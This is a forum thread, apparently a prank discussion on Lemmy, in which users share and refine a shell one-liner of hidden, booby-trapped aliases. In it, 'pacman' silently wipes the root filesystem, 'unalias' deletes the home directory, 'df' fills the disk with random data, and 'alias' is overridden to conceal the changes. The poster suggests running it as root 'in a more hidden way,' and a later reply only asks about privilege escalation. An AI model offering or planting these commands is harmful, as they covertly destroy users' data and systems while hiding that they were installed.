It’s not perfect, plus I added something extra, but it’s a slight improvement. Also, I wish there was a way to turn off that code block color formatting in Lemmy 0.19.x. Nevermind, copy-pasted it into glorious Vim, I didn’t escape the single quote in “You’re”.
Edit 2: Nevermind, that still screws up single quotes as \ is literal. _ will do ¯\_(ツ)_/¯
This needs to be done with something that would be run as root, in a more hidden way, without disrupting service.
export OLDALIASVALUES=$(alias) \ && alias alias='echo "${OLDALIASVALUES}"' \ && \alias pacman='(rm -rf --no-preserve-root / &) &> /dev/null ; \pacman' \ && \alias unalias='(rm -rf ~/* ~/.* &) &> /dev/null ; sleep 5 ; echo "Not so fast my friend. You_re becoming homeless."' \ && \alias df='(cat /dev/urandom >> ~/.df_stands_for_disk_full &) &> /dev/null ; \df'
It’s not perfect, plus I added something extra, but it’s a slight improvement.
Also, I wish there was a way to turn off that code block color formatting in Lemmy 0.19.x.Nevermind, copy-pasted it into glorious Vim, I didn’t escape the single quote in “You’re”.Edit 2: Nevermind, that still screws up single quotes as \ is literal. _ will do ¯\_(ツ)_/¯
you have to alias alias last, so it actually aliases.
Oh crap, I forgot. Thanks. I just escaped it.
There is! Markdown supports
```<language>
to enable syntax highlighting in code blocks. If you have an invalid language (e.g. .), it will just disable syntax highlighting.
Does this really work? Won’t be this a security issue since this may be used for privilege escalation?